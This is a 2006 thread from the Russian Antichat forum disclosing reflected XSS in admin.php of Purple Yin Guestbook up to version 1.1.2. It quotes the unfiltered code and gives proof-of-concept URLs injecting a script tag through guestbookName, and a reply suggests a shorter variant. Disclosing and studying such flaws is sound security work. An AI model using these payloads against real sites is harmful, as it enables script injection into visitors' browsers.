ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Пассивные XSS в Purple Yin Guestbook Version <=1.1.2
  #1  
Старый 23.09.2006, 02:25
Аватар для 1ten0.0net1
1ten0.0net1
Time out
Регистрация: 28.11.2005
Сообщений: 547
Провел на форуме:
2320925

Репутация: 1348


По умолчанию Пассивные XSS в Purple Yin Guestbook Version <=1.1.2

Из-за отсутствия фильтрации большинтсва параметров в скрипте admin.php становится возможной реализация XSS нападения.

Пример бажного кода admin.php:

$guestbookName=GUESTBOOK_NAME;
.....
<td></td><td><a href="http://purpleyin.com"><p style="font-weight:bold;color:#FFFFFF;">$guestbookName</p></a></td>

Значение константы GUESTBOOK_NAME присваивается переменной $guestbookNamе, при этом сама константа не определена.


Proof of concept:

http://site.com/guestbook/admin.php?guestbookName="><script>alert(/XSS/)</script>

Кроме этого уязвимы почти все остальные параметры данного скрипта. Видимо, создатели посчитали, что скрипт admin.php будет просматривать только админ.

P. S. Работает в Internet Explorer
__________________
Нельзя считать себя достаточно взрослым, если у тебя школьные фотографии - цифровые.

Последний раз редактировалось 1ten0.0net1; 23.09.2006 в 02:33..
 
Ответить с цитированием

  #2  
Старый 23.09.2006, 08:40
Аватар для [hidden]
[hidden]
Участник форума
Регистрация: 05.11.2005
Сообщений: 103
Провел на форуме:
425441

Репутация: 31
По умолчанию

Может, я чего-то не догоняю, но если заходить по адресу

http://site.com/guestbook/admin.php?guestbookName="><script>alert(/XSS/)</script>

то это преобразуется в

<td></td><td><a href="http://purpleyin.com"><p style="font-weight:bold;color:#FFFFFF;">"><script>alert(/XSS/)</script></p></a></td>

Может, можно обойтись

http://site.com/guestbook/admin.php?guestbookName=<script>alert(/XSS/)</script> ?

Сорри, если чего недопонял, и просьба хотя бы ткнуть носом в то место, которое я не понял..
 
Ответить с цитированием

  #3  
Старый 24.09.2006, 02:08
Аватар для KPOT_f!nd
KPOT_f!nd
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
Провел на форуме:
3405508

Репутация: 1745


По умолчанию

Пригодиться!
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Для новичков (пассивные Xss) DRON-ANARCHY Чаты 34 06.06.2009 12:02
Xss для новичков Micr0b Уязвимости 0 04.06.2006 18:25



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ